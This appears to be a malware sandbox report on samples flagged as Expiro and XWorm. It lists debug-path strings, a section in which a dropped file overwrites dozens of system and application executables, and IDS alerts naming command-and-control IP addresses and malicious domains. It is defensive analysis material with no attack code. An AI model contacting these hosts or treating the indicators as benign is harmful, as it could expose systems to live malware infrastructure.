Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: wdmvmswJ.pif, 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\wbem\WmiApSrv.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\vds.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\alg.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\snmptrap.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\Spectrum.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\Locator.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\msiexec.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\VSSVC.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\wbengine.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\SearchIndexer.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\TieringEngineService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\AgentService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\msdtc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 4_2_02AF5908
Source: C:\Users\Public\alpha.pif Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 13_2_00020207
Source: C:\Users\Public\alpha.pif Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 13_2_0002589A
Source: C:\Users\Public\alpha.pif Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose, 13_2_00033E66
Source: C:\Users\Public\alpha.pif Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 13_2_00024EC1
Source: C:\Users\Public\alpha.pif Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 13_2_0001532E
Source: C:\Users\Public\alpha.pif Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 17_2_0002589A
Source: C:\Users\Public\alpha.pif Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 17_2_00020207
Source: C:\Users\Public\alpha.pif Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose, 17_2_00033E66
Source: C:\Users\Public\alpha.pif Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 17_2_00024EC1
Source: C:\Users\Public\alpha.pif Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 17_2_0001532E
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

Networking

Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49708 -> 54.244.188.177:80
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:65093 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:51366 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:61527 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60770 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 62.60.190.120:7923 -> 192.168.2.8:49727
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 62.60.190.120:7923 -> 192.168.2.8:49727
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49800 -> 18.246.231.120:80
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49727 -> 62.60.190.120:7923
Source: Network traffic Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:50711 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:58390 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:57993 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:61989 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:50171 -> 18.141.10.107:80
